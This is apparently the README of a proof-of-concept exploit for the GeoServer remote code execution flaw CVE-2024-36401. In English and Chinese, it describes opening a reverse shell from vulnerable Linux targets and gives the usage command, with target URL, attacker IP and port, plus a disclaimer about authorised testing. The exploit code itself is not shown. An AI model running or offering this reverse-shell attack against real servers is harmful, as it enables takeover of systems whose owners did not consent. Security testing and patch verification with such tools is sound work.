
POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.
CVE-2024-36401 GeoServer 的 POC。该 POC 将尝试从目标建立反向系统 shell。

CVE-2024-36401 的 POC:针对 GeoServer 2.25.1、2.24.3 和 2.23.5 之前版本的 RCE。此 POC 基于 phith0n 的安全公告。
该 POC 将尝试从脆弱目标建立反向 shell。它旨在针对脆弱的 Linux 目标。您需要拥有一个具有公开且可访问 IP 的机器才能运行此 POC。
requests 库针对单个目标使用此 POC:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
帮助:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
如有任何建议或想法,请通过 我 与我联系。
我喜欢为了乐趣、工作和教育目的创建自己的工具。我不支持或鼓励黑客行为或未经授权访问任何系统或网络。请负责任地使用我的工具,并且仅在您拥有明确测试权限的系统上使用。